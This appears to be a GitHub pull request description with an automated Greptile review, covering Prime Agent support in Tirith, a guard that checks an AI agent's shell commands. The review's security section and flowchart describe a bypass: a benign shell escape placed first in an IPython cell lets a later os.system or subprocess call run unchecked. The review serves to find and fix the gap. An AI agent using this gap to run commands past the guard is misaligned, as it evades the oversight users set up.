- Updated the `tirith setup` CLI to support `prime-agent` as a tool, including `--with-mcp` for MCP gateway registration, proper scope handling, and extension installation logic. This includes changes to tool registration, scope resolution, and setup dispatch. [[1]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091R38) [[2]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091L121-R124) [[3]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091L133-R134) [[4]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091R168) [[5]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091L176-R178) [[6]](diffhunk://#diff-730bd48ebad4ba513294373f837a4fd1a3fe4dda8072d6b72d7562085fd14091R471-R474) [[7]](diffhunk://#diff-dcf1742846be061a28fb0ae057a8c2eb5d395be7bdaee0822160bdc2fe9b8917R531-R601)

**Documentation**

- Added a new guide (`mcp/clients/prime-agent.md`) detailing how the Prime Agent extension works, setup instructions, decision logic, environment variables, and verification steps.
- Updated the main CLI help and `README.md` to document Prime Agent support and usage examples. [[1]](diffhunk://#diff-fbdd282e258bb248c9a5d5ad0449277449f4c3c3fcee313edf24d73953f823b4L967-R970) [[2]](diffhunk://#diff-b335630551682c19a781afebcf4d07bf978fb1f8ac04c6bf87428ed5106870f5R637)

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

The PR adds Prime Agent shell-command enforcement and setup support, including optional MCP registration. The prior individual syntax bypasses are addressed, but mixed IPython cells can still cause only a benign command to be checked while a dangerous Python shell call executes unchecked.

- Adds a TypeScript Prime Agent extension for Bash tools and IPython shell execution.
- Adds project/user installation and optional MCP setup through `tirith setup prime-agent`.
- Documents setup, enforcement behavior, environment overrides, and verification.

<h3>Confidence Score: 3/5</h3>

The PR is not yet safe to merge because mixed IPython cells can execute a dangerous Python shell command after Tirith checks only a benign shell escape.

The extractor returns immediately after finding any line-level escape, preventing its later Python-call scan from seeing additional shell execution in the same cell; the handler consequently approves the whole cell based on an incomplete command set.

**Files Needing Attention:** crates/tirith/assets/hooks/tirith-guard-prime-agent.ts

<details open><summary><h3>Security Review</h3></summary>

A mixed IPython cell can place a benign bang or assignment escape before an `os.system` or `subprocess` call. The extractor returns after collecting the benign escape, so Tirith checks only that command and the later shell command executes without a security verdict.
</details>

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| crates/tirith/assets/hooks/tirith-guard-prime-agent.ts | Adds Prime Agent command extraction and enforcement, but early return from line-level extraction skips Python shell calls in mixed cells. |
| crates/tirith/src/cli/setup/tools.rs | Adds project/user Prime Agent extension installation and optional MCP settings registration. |
| crates/tirith/src/cli/setup/mod.rs | Registers Prime Agent as a supported setup target with scope and MCP option handling. |
| mcp/clients/prime-agent.md | Documents Prime Agent installation, command interception, decision behavior, and environment overrides. |

<h3>Flowchart</h3>

```mermaid
%%{init: {'theme': 'neutral'}}%%
flowchart TD
  A[Prime Agent submits mixed IPython cell] --> B[Extract benign line-level shell escape]
  B --> C[Return bangCommands early]
  C --> D[Run Tirith check on benign command]
  D --> E[Allow complete IPython tool call]
  E --> F[Python shell call executes unchecked]
```

<sub>Reviews (4): Last reviewed commit: ["fix(guard): close shell-escape bypasses ..."](https://github.com/sheeki03/tirith/commit/36780715720bce455baf424ee221de9e3fa57409) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=52573874)</sub>

> Greptile also left **1 inline comment** on this PR.

**Context used:**

- Knowledge Base — [CLI Entrypoint and Command Dispatch](https://app.greptile.com/my-company-org-6010/-/custom-context/knowledge-base/sheeki03/tirith/-/docs/cli-and-commands.md)
- Knowledge Base — [Policy and Approval](https://app.greptile.com/my-company-org-6010/-/custom-context/knowledge-base/sheeki03/tirith/-/docs/policy-and-approval.md)

<!-- /greptile_comment -->